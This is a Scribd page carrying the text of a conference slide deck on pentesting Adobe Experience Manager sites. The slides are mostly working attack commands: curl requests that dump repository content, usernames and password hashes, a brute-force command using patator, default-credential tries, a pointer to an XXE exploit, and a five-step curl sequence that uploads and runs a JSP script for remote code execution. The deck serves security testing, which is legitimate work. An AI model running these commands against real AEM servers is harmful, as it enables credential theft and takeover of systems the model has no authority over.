Scribd Logo
Upload

Welcome to Scribd!

  • Hacking Adobe Experience Manager Sites

    Uploaded by

    0ang3el
    623 views23 pages
    This presentations is about pentesting AEM web applications. It have been shown on PHDays security conference.

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This presentations is about pentesting AEM web applications. It have been shown on PHDays security conference.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    623 views23 pages

    Hacking Adobe Experience Manager Sites

    Uploaded by

    0ang3el
    This presentations is about pentesting AEM web applications. It have been shown on PHDays security conference.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 23

    Hack1ng

    Adobe Experience
    Manager sites

    Who is that guy?


    Mikhail Egorov
    Security researcher
    Works in Odin (Parallels)
    0ang3el (at) gma1l (d0t) com

    Related Work
    http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
    http://www.slideshare.net/CQCON/prsentation-ben-zahler
    https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html

    What do we want
    Sensitive information from JCR
    Installed OSGI bundles
    Custom scripts
    Usernames
    Password hashes
    Elements that allow anonymous modification

    Sensitive information from JCR


    Use JsonRendererServlet
    curl

    -X GET http://127.0.0.1:8080/.json

    curl

    -X GET http://127.0.0.1:8080/.6.json

    curl

    -X GET http://127.0.0.1:8080/.tidy.6.json

    curl

    -X GET http://127.0.0.1:8080/.tidy.infinity.json

    Installed OSGI bundles


    List of all bundles
    curl

    -X GET http://127.0.0.1:8080/bin.tidy.infinity.json

    QueryBuilder is your friend!


    http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

    curl

    -X GET http://127.0.0.1:8080/bin/querybuilder.json

    Custom scripts
    List customs scripts
    curl

    -X GET http://127.0.0.1:8080/apps.tidy.infinity.json

    List compiled custom scripts from cache


    curl

    -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json

    Usernames
    Dump content node properties
    curl

    -X GET http://127.0.0.1:8080/content.infinity.json

    Use regular expression to extract usernames (pipe with prev command)


    python -c 'import sys,re; print "\n".join([m.group(1) for m in
    re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])])' |
    sort u

    Password hashes
    Use QueryBuilder bundle

    curl -X GET
    http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
    ective&p.properties=rep:principalName%20rep:password&p.limit=100

    Anonymous modification
    Dump content node properties
    curl

    -X GET http://127.0.0.1:8080/content.infinity.json

    Use regular expression to check (pipe with prev command)


    python -c 'import sys,re; m =
    re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print
    "Anon modification: ","Yes" if m else "No"'

    Getting access
    Try default user credentials: admin/admin, author/author,
    anonymous/anonymous
    Offline attack (brute hashes)
    Online attack (POST servlet bundle)
    patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
    method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
    auth_type=basic -x ignore:code!=200 --threads 5

    You have access, now what?


    XSS
    Not covered, sorry!
    CSRF
    DoS
    Read local files
    RCE

    Webdav bundle, XXE


    CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
    Webdav OSGI bundle uses XML parser that is not properly initialized
    Exploit - https://www.exploit-db.com/exploits/37110/

    Webdav bundle, XXE


    Out-of-bound exploitation
    http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

    Pros: works with anonymous credentials


    Cons: you need external server, instable

    Inbound exploitation
    Pros: you do not need external server, more stable
    Cons: you need credentials of the user that is able to modify some node in JCR

    Webdav bundle, XXE Demo

    http://www.youtube.com/watch?v=Hg3AXoG89Gs

    Remote code execution


    We have node http://127.0.0.1:8080/rce
    {"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

    We have script exec.jsp that is magically loaded into node


    http://127.0.0.1:8080/apps/rcetype
    {"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
    GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
    ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

    When someone navigates to http://127.0.0.1:8080/rce.exec our


    exec.jsp will be executed.

    Remote code execution


    Step I: Create rcetype node
    curl u admin:admin Fjcr:primaryType=nt:folder
    http://127.0.0.1:8080/content/rcetype

    Remote code execution


    Step II: Upload script exec.jsp to rcetype node
    curl u admin:admin Fexec.jsp=@RCE.jsp
    http://127.0.0.1:8080/content/rcetype

    Remote code execution


    Step III: Copy rcetype to /apps
    curl u admin:admin F:operation=copy F:dest=/apps/rcetype
    http://127.0.0.1:8080/content/rcetype

    Remote code execution


    Step IV: Create rce node bound to rcetype
    curl u admin:admin Fsling:resourceType=rcetype
    http://127.0.0.1:8080/content/rce

    Remote code execution


    Step V: Launch jsp script
    curl X GET http://127.0.0.1:8080/content/rce.exec

    Remote code execution, Demo

    http://www.youtube.com/watch?v=Z9n2T07e6Ls

    Ask a Ninja

    You might also like